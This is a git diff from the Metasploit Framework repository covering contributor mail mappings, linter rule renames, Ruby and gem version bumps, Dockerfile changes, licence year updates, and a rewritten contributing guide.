Land #13019, Revert "Land #12960, add ttl to job results instantiated from an RPC request"

This reverts commit ff8bb2e16f, reversing
changes made to ae28463ec6.

.mailmap

@@ -1,39 +1,42 @@
-acammack-r7 <acammack-r7@github>     <acammack@aus-mbp-1099.aus.rapid7.com>
-acammack-r7 <acammack-r7@github>     <adam_cammack@rapid7.com>
-acammack-r7 <acammack-r7@github>     <Adam_Cammack@rapid7.com>
-bcook-r7 <bcook-r7@github>           <bcook@rapid7.com>
-bcook-r7 <bcook-r7@github>           <busterb@gmail.com>
-bturner-r7 <bturner-r7@github>       <brandon_turner@rapid7.com>
-bwatters-r7 <bwatters-r7@github>     <bwatters@rapid7.com>
-cdoughty-r7 <cdoughty-r7@github>     <chris_doughty@rapid7.com>
-dheiland-r7 <dheiland-r7@github>     <dh@layereddefense.com>
-dwelch-r7 <dwelch-r7@github>         <dean_welch@rapid7.com>
-ecarey-r7 <ecarey-r7@github>         <e@ipwnstuff.com>
-jbarnett-r7 <jbarnett-r7@github>     <James_Barnett@rapid7.com>
-jbarnett-r7 <jbarnett-r7@github>     <jbarnett@rapid7.com>
-jinq102030 <jinq102030@github>       <Jin_Qian@rapid7.com>
-jinq102030 <jinq102030@github>       <jqian@rapid7.com>
-jmartin-r7 <jmartin-r7@github>       <Jeffrey_Martin@rapid7.com>
-lsato-r7 <lsato-r7@github>           <lsato@rapid7.com>
-lvarela-r7 <lvarela-r7@github>       <“leonardo_varela@rapid7.com”>
-mkienow-r7 <mkienow-r7@github>       <matthew_kienow@rapid7.com>
-pbarry-r7 <pbarry-r7@github>         <pearce_barry@rapid7.com>
-pdeardorff-r7 <pdeardorff-r7@github> <paul_deardorff@rapid7.com>
-pdeardorff-r7 <pdeardorff-r7@github> <Paul_Deardorff@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>   <sgonzalez@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>   <sonny_gonzalez@rapid7.com>
-shuckins-r7 <shuckins-r7@github>     <samuel_huckins@rapid7.com>
-space-r7 <space-r7@github>           <shelby_pace@rapid7.com>
-tdoan-r7 <tdoan-r7@github>           <thao_doan@rapid7.com>
-todb-r7 <todb-r7@github>             <tod_beardsley@rapid7.com>
-todb-r7 <todb-r7@github>             <todb@metasploit.com>
-todb-r7 <todb-r7@github>             <todb@packetfu.com>
-wchen-r7 <wchen-r7@github>           <msfsinn3r@gmail.com> # aka sinn3r
-wchen-r7 <wchen-r7@github>           <wei_chen@rapid7.com>
-wvu-r7 <wvu-r7@github>               <William_Vu@rapid7.com>
-wvu-r7 <wvu-r7@github>               <wvu@cs.nmt.edu>
-wvu-r7 <wvu-r7@github>               <wvu@metasploit.com>
-wwalker-r7 <wwalker-r7@github>       <wyatt_walker@rapid7.com>
+acammack-r7 <acammack-r7@github>       <acammack@aus-mbp-1099.aus.rapid7.com>
+acammack-r7 <acammack-r7@github>       <adam_cammack@rapid7.com>
+acammack-r7 <acammack-r7@github>       <Adam_Cammack@rapid7.com>
+adamgalway-r7 <adamgalway-r7@github>   <adam_galway@rapid7.com>
+adfoster-r7 <adfoster-r7@github>       <alandavid_foster@rapid7.com>
+bcook-r7 <bcook-r7@github>             <bcook@rapid7.com>
+bcook-r7 <bcook-r7@github>             <busterb@gmail.com>
+bturner-r7 <bturner-r7@github>         <brandon_turner@rapid7.com>
+bwatters-r7 <bwatters-r7@github>       <bwatters@rapid7.com>
+cdelafuente-r7 <cdelafuente-r7@github> Christophe De La Fuente <christophe_delafuente@rapid7.com>
+cdoughty-r7 <cdoughty-r7@github>       <chris_doughty@rapid7.com>
+dheiland-r7 <dheiland-r7@github>       <dh@layereddefense.com>
+dwelch-r7 <dwelch-r7@github>           <dean_welch@rapid7.com>
+ecarey-r7 <ecarey-r7@github>           <e@ipwnstuff.com>
+jbarnett-r7 <jbarnett-r7@github>       <James_Barnett@rapid7.com>
+jbarnett-r7 <jbarnett-r7@github>       <jbarnett@rapid7.com>
+jinq102030 <jinq102030@github>         <Jin_Qian@rapid7.com>
+jinq102030 <jinq102030@github>         <jqian@rapid7.com>
+jmartin-r7 <jmartin-r7@github>         <Jeffrey_Martin@rapid7.com>
+lsato-r7 <lsato-r7@github>             <lsato@rapid7.com>
+lvarela-r7 <lvarela-r7@github>         <“leonardo_varela@rapid7.com”>
+mkienow-r7 <mkienow-r7@github>         <matthew_kienow@rapid7.com>
+pbarry-r7 <pbarry-r7@github>           <pearce_barry@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github>   <paul_deardorff@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github>   <Paul_Deardorff@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>     <sgonzalez@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>     <sonny_gonzalez@rapid7.com>
+shuckins-r7 <shuckins-r7@github>       <samuel_huckins@rapid7.com>
+smcintyre-r7 <smcintyre-r7@github>     <spencer_mcintyre@rapid7.com>
+space-r7 <space-r7@github>             <shelby_pace@rapid7.com>
+tdoan-r7 <tdoan-r7@github>             <thao_doan@rapid7.com>
+todb-r7 <todb-r7@github>               <tod_beardsley@rapid7.com>
+todb-r7 <todb-r7@github>               <todb@metasploit.com>
+todb-r7 <todb-r7@github>               <todb@packetfu.com>
+wchen-r7 <wchen-r7@github>             <msfsinn3r@gmail.com> # aka sinn3r
+wchen-r7 <wchen-r7@github>             <wei_chen@rapid7.com>
+wvu-r7 <wvu-r7@github>                 <William_Vu@rapid7.com>
+wvu-r7 <wvu-r7@github>                 <wvu@nmt.edu>
+wwalker-r7 <wwalker-r7@github>         <wyatt_walker@rapid7.com>
 
 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at

.rubocop.yml

@@ -112,21 +112,21 @@ Metrics/MethodLength:
                   often exceed 200 lines.
   Max: 300
 
-Naming/UncommunicativeMethodParamName:
+Naming/MethodParameterName:            
   Enabled: true
   Description: 'Whoever made this requirement never looked at crypto methods, IV'
   MinNameLength: 2
 
 # %q() is super useful for long strings split over multiple lines and
 # is very common in module constructors for things like descriptions
-Style/UnneededPercentQ:
+Style/RedundantPercentQ:
   Enabled: false
 
 Style/NumericLiterals:
   Enabled: false
   Description: 'This often hurts readability for exploit-ish code.'
 
-Layout/AlignHash:
+Layout/HashAlignment:
   Enabled: false
   Description: 'aligning info hashes to match these rules is almost impossible to get right'
 
@@ -142,7 +142,7 @@ Layout/EmptyLinesAroundMethodBody:
   Enabled: false
   Description: 'these are used to increase readability'
 
-Layout/AlignParameters:
+Layout/ParameterAlignment:
   Enabled: true
   EnforcedStyle: 'with_fixed_indentation'
   Description: 'initialize method of every module has fixed indentation for Name, Description, etc'

.ruby-version

@@ -1 +1 @@
-2.6.2
+2.6.5

.travis.yml

@@ -11,8 +11,8 @@ addons:
       - graphviz
 language: ruby
 rvm:
-  - '2.5.5'
-  - '2.6.2'
+  - '2.5.7'
+  - '2.6.5'
 
 env:
   - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
@@ -43,7 +43,7 @@ before_install:
   - ls -la ./.git/hooks
   - ./.git/hooks/post-merge
   # Update the bundler
-  - gem update --system
+  - gem update --system 3.0.6
   - gem install bundler
 before_script:
   - cp config/database.yml.travis config/database.yml

CONTRIBUTING.md

@@ -1,63 +1,66 @@
-# Hello, World!
-
-Thanks for your interest in making Metasploit -- and therefore, the
-world -- a better place!  Before you get started, review our
-[Code of Conduct].  There are mutliple ways to help beyond just writing code:
- - [Submit bugs and feature requests] with detailed information about your issue or idea.
- - [Help fellow users with open issues] or [help fellow committers test recent pull requests].
- - [Report a security vulnerability in Metasploit itself] to Rapid7.
- - Submit an updated or brand new module!  We are always eager for exploits, scanners, and new
-   integrations or features. Don't know where to start? Set up a [development environment], then head over to ExploitDB to look for [proof-of-concept exploits] that might make a good module.
-
 # Contributing to Metasploit
+Thank you for your interest in making Metasploit -- and therefore, the
+world -- a better place!  Before you get started, please review our [Code of Conduct](https://github.com/rapid7/metasploit-framework/wiki/Code-Of-Conduct). This helps us ensure our community is positive and supportive for everyone involved. 
+
+## Code Free Contributions 
+Before we get into the details of contributing code, you should know there are multiple ways you can add to Metasploit without any coding experience:
+
+ - You can [submit bugs and feature requests](https://github.com/rapid7/metasploit-framework/issues/new) with detailed information about your issue or idea: 
+ 	- If you'd like to propose a feature, describe what you'd like to see. Mock ups of console views would be great.
+ 	- If you're reporting a bug, please be sure to include the expected behaviour, the observed behaviour, and steps to reproduce the problem. Resource scripts, console copy-pastes, and any background on the environment you encountered the bug in would be appreciated. More information can be found [below](#bug-reports).
+ - [Help fellow users with open issues]. This can require technical knowledge, but you can also get involved in conversations about bug reports and feature requests. This is a great way to get involved without getting too overwhelmed! 
+ - [Help fellow committers test recently submitted pull requests](https://github.com/rapid7/metasploit-framework/pulls). Again this can require some technical skill, but by pulling down a pull request and testing it, you can help ensure our new code contributions for stability and quality. 
+ - [Report a security vulnerability in Metasploit itself] to Rapid7. If you see something you think makes Metasploit vulnerable to an attack, let us know!  
+ - [Add module documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation). New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native english speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand. 
 
-Here's a short list of do's and don'ts to make sure *your* valuable contributions actually make
-it into Metasploit's master branch.  If you do not care to follow these rules, your contribution
-**will** be closed. Sorry!
 
 ## Code Contributions
+For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-an-exploit). It will help you to get started and avoid some common mistakes.
 
-* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
+Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.  
+
+Finally, follow our short list of do's and don'ts below to make sure your valuable contributions actually make it into Metasploit's master branch! We try to consider all our pull requests fairly and in detail, but if you do not follow these rules, your contribution
+will be closed. We need to ensure the code we're adding to master is written to a high standard.
+
+
+### Code Contribution Do's & Don'ts:
+--
+#### <u>Pull Requests</u>
+**Pull request [PR#9966] is a good example to follow.**
+
+* **Do** create a [topic branch] to work on instead of working directly on `master`. This helps to:
+	*  Protect the process.
+	* Ensures users are aware of commits on the branch being considered for merge.  
+	* Allows for a location for more commits to be offered without mingling with other contributor changes.
+	* Allows contributors to make progress while a PR is still being reviewed.
 * **Do** follow the [50/72 rule] for Git commit messages.
-* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
-* **Do** create a [topic branch] to work on instead of working directly on `master`.
-  This helps protect the process, ensures users are aware of commits on the branch being considered for merge,
-  allows for a location for more commits to be offered without mingling with other contributor changes,
-  and allows contributors to make progress while a PR is still being reviewed.
-
-
-### Pull Requests
-
 * **Do** write "WIP" on your PR and/or open a [draft PR] if submitting **working** yet unfinished code.
 * **Do** target your pull request to the **master branch**.
 * **Do** specify a descriptive title to make searching for your pull request easier.
-* **Do** include [console output], especially for witnessable effects in `msfconsole`.
+* **Do** include [console output], especially for effects that can be witnessed in the  `msfconsole`.
 * **Do** list [verification steps] so your code is testable.
 * **Do** [reference associated issues] in your pull request description.
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.
+* **Don't** post questions in older closed PRs.
 
-Pull request [PR#9966] is a good example to follow.
-
-#### New Modules
-
+#### <u>New Modules</u>
+* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
+* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
 * **Do** set up `msftidy` to fix any errors or warnings that come up as a [pre-commit hook].
 * **Do** use the many module mixin [API]s.
-* **Don't** include more than one module per pull request.
 * **Do** include instructions on how to setup the vulnerable environment or software.
 * **Do** include [Module Documentation] showing sample run-throughs.
-* **Don't** submit new [scripts].  Scripts are shipped as examples for automating local tasks, and
-  anything "serious" can be done with post modules and local exploits.
-
-#### Library Code
+* **Don't** include more than one module per pull request.
+* **Don't** submit new [scripts].  Scripts are shipped as examples for automating local tasks, and anything "serious" can be done with post modules and local exploits.
 
+#### <u>Library Code</u>
 * **Do** write [RSpec] tests - even the smallest change in a library can break existing code.
 * **Do** follow [Better Specs] - it's like the style guide for specs.
 * **Do** write [YARD] documentation - this makes it easier for people to use your code.
 * **Don't** fix a lot of things in one pull request. Small fixes are easier to validate.
 
-#### Bug Fixes
-
+#### <u>Bug Fixes</u>
 * **Do** include reproduction steps in the form of verification steps.
 * **Do** link to any corresponding [Issues] in the format of `See #1234` in your commit description.
 
@@ -69,6 +72,7 @@ When reporting Metasploit issues:
 * **Do** write a detailed description of your bug and use a descriptive title.
 * **Do** include reproduction steps, stack traces, and anything that might help us fix your bug.
 * **Don't** file duplicate reports; search for your bug before filing a new report.
+* **Don't** attempt to report issues on a closed PR.
 
 If you need some more guidance, talk to the main body of open source contributors over on our
 [Metasploit Slack] or [#metasploit on Freenode IRC].
@@ -97,8 +101,8 @@ curve, so keep it up!
 [Module Documentation]:https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation
 [scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
 [RSpec]:http://rspec.info
-[Better Specs]:http://betterspecs.org
+[Better Specs]:http://www.betterspecs.org/
 [YARD]:http://yardoc.org
 [Issues]:https://github.com/rapid7/metasploit-framework/issues
 [Metasploit Slack]:https://www.metasploit.com/slack
-[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
+[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4

COPYING

@@ -1,4 +1,4 @@
-Copyright (C) 2006-2018, Rapid7, Inc.
+Copyright (C) 2006-2020, Rapid7, Inc.
 All rights reserved.
 
 Redistribution and use in source and binary forms, with or without modification,

Dockerfile

@@ -1,4 +1,4 @@
-FROM ruby:2.6.2-alpine3.9 AS builder
+FROM ruby:2.6.5-alpine3.10 AS builder
 LABEL maintainer="Rapid7"
 
 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
@@ -27,16 +27,16 @@ RUN apk add --no-cache \
       zlib-dev \
       ncurses-dev \
       git \
-    && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
-    && gem update --system \
-    && bundle install --clean --no-cache --system $BUNDLER_ARGS \
+    && echo "gem: --no-document" > /etc/gemrc \
+    && gem update --system 3.0.6 \
+    && bundle install --force --clean --no-cache --system $BUNDLER_ARGS \
     # temp fix for https://github.com/bundler/bundler/issues/6680
     && rm -rf /usr/local/bundle/cache \
     # needed so non root users can read content of the bundle
     && chmod -R a+r /usr/local/bundle
 
 
-FROM ruby:2.6.2-alpine3.9
+FROM ruby:2.6.5-alpine3.10
 LABEL maintainer="Rapid7"
 
 ENV APP_HOME=/usr/src/metasploit-framework
@@ -51,8 +51,11 @@ RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresq
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
 
-COPY --chown=root:metasploit --from=builder /usr/local/bundle /usr/local/bundle
-COPY --chown=root:metasploit . $APP_HOME/
+COPY --from=builder /usr/local/bundle /usr/local/bundle
+RUN chown -R root:metasploit /usr/local/bundle
+COPY . $APP_HOME/
+RUN chown -R root:metasploit $APP_HOME/
+RUN chmod 664 $APP_HOME/Gemfile.lock
 RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
 
 WORKDIR $APP_HOME

Gemfile

@@ -17,7 +17,7 @@ group :development do
   # generating documentation
   gem 'yard'
   # for development and testing purposes
-  gem 'pry'
+  gem 'pry-byebug'
   # module documentation
   gem 'octokit'
   # Metasploit::Aggregator external session proxy

Gemfile.lock

@@ -1,14 +1,13 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (5.0.45)
+    metasploit-framework (5.0.78)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
       aws-sdk-ec2
       aws-sdk-iam
       aws-sdk-s3
-      backports
       bcrypt (= 3.1.12)
       bcrypt_pbkdf
       bit-struct
@@ -16,16 +15,20 @@ PATH
       dnsruby
       ed25519
       em-http-request
+      eventmachine
       faker
+      faraday (<= 0.17.0)
+      faye-websocket
       filesize
+      hrr_rb_ssh (= 0.3.0.pre2)
       jsobfu
       json
       metasm
-      metasploit-concern
-      metasploit-credential
-      metasploit-model
-      metasploit-payloads (= 1.3.70)
-      metasploit_data_models (= 3.0.10)
+      metasploit-concern (~> 2.0.0)
+      metasploit-credential (~> 3.0.0)
+      metasploit-model (~> 2.0.4)
+      metasploit-payloads (= 1.3.84)
+      metasploit_data_models (~> 3.0.10)
       metasploit_payloads-mettle (= 0.5.16)
       mqtt
       msgpack
@@ -59,7 +62,7 @@ PATH
       rex-random_identifier
       rex-registry
       rex-rop_builder
-      rex-socket (= 0.1.17)
+      rex-socket
       rex-sslscan
       rex-struct2
       rex-text
@@ -108,44 +111,44 @@ GEM
       minitest (~> 5.1)
       thread_safe (~> 0.3, >= 0.3.4)
       tzinfo (~> 1.1)
-    addressable (2.6.0)
-      public_suffix (>= 2.0.2, < 4.0)
+    addressable (2.7.0)
+      public_suffix (>= 2.0.2, < 5.0)
     afm (0.2.2)
     arel (6.0.4)
-    arel-helpers (2.10.0)
+    arel-helpers (2.11.0)
       activerecord (>= 3.1.0, < 7)
     aws-eventstream (1.0.3)
-    aws-partitions (1.207.0)
-    aws-sdk-core (3.65.1)
+    aws-partitions (1.278.0)
+    aws-sdk-core (3.90.1)
       aws-eventstream (~> 1.0, >= 1.0.2)
-      aws-partitions (~> 1.0)
+      aws-partitions (~> 1, >= 1.239.0)
       aws-sigv4 (~> 1.1)
       jmespath (~> 1.0)
-    aws-sdk-ec2 (1.106.0)
-      aws-sdk-core (~> 3, >= 3.61.1)
+    aws-sdk-ec2 (1.145.0)
+      aws-sdk-core (~> 3, >= 3.71.0)
       aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.29.0)
-      aws-sdk-core (~> 3, >= 3.61.1)
+    aws-sdk-iam (1.33.0)
+      aws-sdk-core (~> 3, >= 3.71.0)
       aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.24.0)
-      aws-sdk-core (~> 3, >= 3.61.1)
+    aws-sdk-kms (1.29.0)
+      aws-sdk-core (~> 3, >= 3.71.0)
       aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.47.0)
-      aws-sdk-core (~> 3, >= 3.61.1)
+    aws-sdk-s3 (1.60.2)
+      aws-sdk-core (~> 3, >= 3.83.0)
       aws-sdk-kms (~> 1)
       aws-sigv4 (~> 1.1)
-    aws-sigv4 (1.1.0)
+    aws-sigv4 (1.1.1)
       aws-eventstream (~> 1.0, >= 1.0.2)
-    backports (3.15.0)
     bcrypt (3.1.12)
     bcrypt_pbkdf (1.0.1)
-    bindata (2.4.4)
+    bindata (2.4.6)
     bit-struct (0.16)
-    builder (3.2.3)
+    builder (3.2.4)
+    byebug (11.1.1)
     coderay (1.1.2)
     concurrent-ruby (1.0.5)
     cookiejar (0.3.3)
-    crass (1.0.4)
+    crass (1.0.6)
     daemons (1.3.1)
     diff-lcs (1.3)
     dnsruby (1.61.3)
@@ -162,26 +165,31 @@ GEM
       eventmachine (>= 1.0.0.beta.4)
     erubis (2.7.0)
     eventmachine (1.2.7)
-    factory_bot (5.0.2)
+    factory_bot (5.1.1)
       activesupport (>= 4.2.0)
-    factory_bot_rails (5.0.2)
-      factory_bot (~> 5.0.2)
+    factory_bot_rails (5.1.1)
+      factory_bot (~> 5.1.0)
       railties (>= 4.2.0)
-    faker (2.2.0)
+    faker (2.2.1)
       i18n (>= 0.8)
-    faraday (0.15.4)
+    faraday (0.17.0)
       multipart-post (>= 1.2, < 3)
+    faye-websocket (0.10.9)
+      eventmachine (>= 0.12.0)
+      websocket-driver (>= 0.5.1)
     filesize (0.2.0)
     fivemat (1.3.7)
     hashery (2.1.2)
+    hrr_rb_ssh (0.3.0.pre2)
+      ed25519 (~> 1.2)
     http_parser.rb (0.6.0)
     i18n (0.9.5)
       concurrent-ruby (~> 1.0)
     jmespath (1.4.0)
     jsobfu (0.4.2)
       rkelly-remix
-    json (2.2.0)
-    loofah (2.2.3)
+    json (2.3.0)
+    loofah (2.4.0)
       crass (~> 1.0.2)
       nokogiri (>= 1.5.9)
     metasm (1.0.4)
@@ -189,7 +197,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-credential (3.0.3)
+    metasploit-credential (3.0.4)
       metasploit-concern
       metasploit-model
       metasploit_data_models (>= 3.0.0)
@@ -203,7 +211,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.3.70)
+    metasploit-payloads (1.3.84)
     metasploit_data_models (3.0.10)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -217,17 +225,18 @@ GEM
     metasploit_payloads-mettle (0.5.16)
     method_source (0.9.2)
     mini_portile2 (2.4.0)
-    minitest (5.11.3)
+    minitest (5.14.0)
     mqtt (0.5.0)
-    msgpack (1.3.1)
+    msgpack (1.3.3)
     multipart-post (2.1.1)
     nessus_rest (0.1.6)
     net-ssh (5.2.0)
     network_interface (0.0.2)
     nexpose (7.2.1)
-    nokogiri (1.10.4)
+    nokogiri (1.10.8)
       mini_portile2 (~> 2.4.0)
-    octokit (4.14.0)
+    octokit (4.16.0)
+      faraday (>= 0.9)
       sawyer (~> 0.8.0, >= 0.5.3)
     openssl-ccm (1.2.2)
     openvas-omp (0.0.4)
@@ -235,7 +244,7 @@ GEM
       pcaprub
     patch_finder (1.0.2)
     pcaprub (0.13.0)
-    pdf-reader (2.2.1)
+    pdf-reader (2.4.0)
       Ascii85 (~> 1.0.0)
       afm (~> 0.2.1)
       hashery (~> 2.0)
@@ -250,8 +259,11 @@ GEM
     pry (0.12.2)
       coderay (~> 1.1.0)
       method_source (~> 0.9.0)
-    public_suffix (3.1.1)
-    rack (1.6.11)
+    pry-byebug (3.8.0)
+      byebug (~> 11.0)
+      pry (~> 0.10)
+    public_suffix (4.0.3)
+    rack (1.6.13)
     rack-protection (1.5.5)
       rack
     rack-test (0.6.3)
@@ -262,16 +274,16 @@ GEM
       activesupport (>= 4.2.0, < 5.0)
       nokogiri (~> 1.6)
       rails-deprecated_sanitizer (>= 1.0.1)
-    rails-html-sanitizer (1.2.0)
-      loofah (~> 2.2, >= 2.2.2)
+    rails-html-sanitizer (1.3.0)
+      loofah (~> 2.3)
     railties (4.2.11.1)
       actionpack (= 4.2.11.1)
       activesupport (= 4.2.11.1)
       rake (>= 0.8.7)
       thor (>= 0.18.1, < 2.0)
-    rake (12.3.3)
+    rake (13.0.1)
     rb-readline (0.5.5)
-    recog (2.3.2)
+    recog (2.3.7)
       nokogiri
     redcarpet (3.5.0)
     rex-arch (0.1.13)
@@ -287,7 +299,7 @@ GEM
       metasm
       rex-arch
       rex-text
-    rex-exploitation (0.1.21)
+    rex-exploitation (0.1.22)
       jsobfu
       metasm
       rex-arch
@@ -300,9 +312,10 @@ GEM
       rex-arch
     rex-ole (0.1.6)
       rex-text
-    rex-powershell (0.1.82)
+    rex-powershell (0.1.87)
       rex-random_identifier
       rex-text
+      ruby-rc4
     rex-random_identifier (0.1.4)
       rex-text
     rex-registry (0.1.3)
@@ -310,40 +323,40 @@ GEM
       metasm
       rex-core
       rex-text
-    rex-socket (0.1.17)
+    rex-socket (0.1.21)
       rex-core
     rex-sslscan (0.1.5)
       rex-core
       rex-socket
       rex-text
     rex-struct2 (0.1.2)
-    rex-text (0.2.23)
+    rex-text (0.2.24)
     rex-zip (0.1.3)
       rex-text
     rkelly-remix (0.0.7)
-    rspec (3.8.0)
-      rspec-core (~> 3.8.0)
-      rspec-expectations (~> 3.8.0)
-      rspec-mocks (~> 3.8.0)
-    rspec-core (3.8.2)
-      rspec-support (~> 3.8.0)
-    rspec-expectations (3.8.4)
+    rspec (3.9.0)
+      rspec-core (~> 3.9.0)
+      rspec-expectations (~> 3.9.0)
+      rspec-mocks (~> 3.9.0)
+    rspec-core (3.9.1)
+      rspec-support (~> 3.9.1)
+    rspec-expectations (3.9.0)
       diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.8.0)
-    rspec-mocks (3.8.1)
+      rspec-support (~> 3.9.0)
+    rspec-mocks (3.9.1)
       diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.8.0)
-    rspec-rails (3.8.2)
+      rspec-support (~> 3.9.0)
+    rspec-rails (3.9.0)
       actionpack (>= 3.0)
       activesupport (>= 3.0)
       railties (>= 3.0)
-      rspec-core (~> 3.8.0)
-      rspec-expectations (~> 3.8.0)
-      rspec-mocks (~> 3.8.0)
-      rspec-support (~> 3.8.0)
+      rspec-core (~> 3.9.0)
+      rspec-expectations (~> 3.9.0)
+      rspec-mocks (~> 3.9.0)
+      rspec-support (~> 3.9.0)
     rspec-rerun (1.1.0)
       rspec (~> 3.0)
-    rspec-support (3.8.2)
+    rspec-support (3.9.2)
     ruby-macho (2.2.0)
     ruby-rc4 (0.1.5)
     ruby_smb (1.1.0)
@@ -351,43 +364,45 @@ GEM
       rubyntlm
       windows_error
     rubyntlm (0.6.2)
-    rubyzip (1.2.3)
+    rubyzip (2.2.0)
     sawyer (0.8.2)
       addressable (>= 2.3.5)
       faraday (> 0.8, < 2.0)
-    simplecov (0.17.0)
+    simplecov (0.18.5)
       docile (~> 1.1)
-      json (>= 1.8, < 3)
-      simplecov-html (~> 0.10.0)
-    simplecov-html (0.10.2)
+      simplecov-html (~> 0.11)
+    simplecov-html (0.12.2)
     sinatra (1.4.8)
       rack (~> 1.5)
       rack-protection (~> 1.4)
       tilt (>= 1.3, < 3)
     sqlite3 (1.3.13)
     sshkey (2.0.0)
-    swagger-blocks (2.0.2)
+    swagger-blocks (3.0.0)
     thin (1.7.2)
       daemons (~> 1.0, >= 1.0.9)
       eventmachine (~> 1.0, >= 1.0.4)
       rack (>= 1, < 3)
-    thor (0.20.3)
+    thor (1.0.1)
     thread_safe (0.3.6)
-    tilt (2.0.9)
+    tilt (2.0.10)
     timecop (0.9.1)
-    ttfunk (1.5.1)
-    tzinfo (1.2.5)
+    ttfunk (1.6.2.1)
+    tzinfo (1.2.6)
       thread_safe (~> 0.1)
-    tzinfo-data (1.2019.2)
+    tzinfo-data (1.2019.3)
       tzinfo (>= 1.0.0)
     warden (1.2.7)
       rack (>= 1.0)
+    websocket-driver (0.7.1)
+      websocket-extensions (>= 0.1.0)
+    websocket-extensions (0.1.4)
     windows_error (0.1.2)
     xdr (2.0.0)
       activemodel (>= 4.2.7)
       activesupport (>= 4.2.7)
     xmlrpc (0.3.0)
-    yard (0.9.20)
+    yard (0.9.24)
 
 PLATFORMS
   ruby
@@ -397,7 +412,7 @@ DEPENDENCIES
   fivemat
   metasploit-framework!
   octokit
-  pry
+  pry-byebug
   rake
   redcarpet
   rspec-rails

LICENSE

@@ -2,7 +2,7 @@ Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Source: http://www.metasploit.com/
 
 Files: *
-Copyright: 2006-2018, Rapid7, Inc.
+Copyright: 2006-2020, Rapid7, Inc.
 License: BSD-3-clause
 
 # The Metasploit Framework is provided under the 3-clause BSD license provided
@@ -71,6 +71,10 @@ Files: lib/anemone.rb lib/anemone/*
 Copyright: 2009 Vertive, Inc.
 License: MIT
 
+Files: lib/expect.rb
+Copyright: 2017 Yukihiro Matsumoto
+License: Ruby
+
 Files: lib/msf/core/modules/external/python/async_timeout/*
 Copyright: 2016-2017 Andrew Svetlov
 License: Apache 2.0

LICENSE_GEMS

@@ -5,29 +5,29 @@ actionview, 4.2.11.1, MIT
 activemodel, 4.2.11.1, MIT
 activerecord, 4.2.11.1, MIT
 activesupport, 4.2.11.1, MIT
-addressable, 2.6.0, "Apache 2.0"
+addressable, 2.7.0, "Apache 2.0"
 afm, 0.2.2, MIT
 arel, 6.0.4, MIT
-arel-helpers, 2.10.0, MIT
+arel-helpers, 2.11.0, MIT
 aws-eventstream, 1.0.3, "Apache 2.0"
-aws-partitions, 1.207.0, "Apache 2.0"
-aws-sdk-core, 3.65.1, "Apache 2.0"
-aws-sdk-ec2, 1.106.0, "Apache 2.0"
-aws-sdk-iam, 1.29.0, "Apache 2.0"
-aws-sdk-kms, 1.24.0, "Apache 2.0"
-aws-sdk-s3, 1.47.0, "Apache 2.0"
-aws-sigv4, 1.1.0, "Apache 2.0"
-backports, 3.15.0, MIT
+aws-partitions, 1.278.0, "Apache 2.0"
+aws-sdk-core, 3.90.1, "Apache 2.0"
+aws-sdk-ec2, 1.145.0, "Apache 2.0"
+aws-sdk-iam, 1.33.0, "Apache 2.0"
+aws-sdk-kms, 1.29.0, "Apache 2.0"
+aws-sdk-s3, 1.60.2, "Apache 2.0"
+aws-sigv4, 1.1.1, "Apache 2.0"
 bcrypt, 3.1.12, MIT
 bcrypt_pbkdf, 1.0.1, MIT
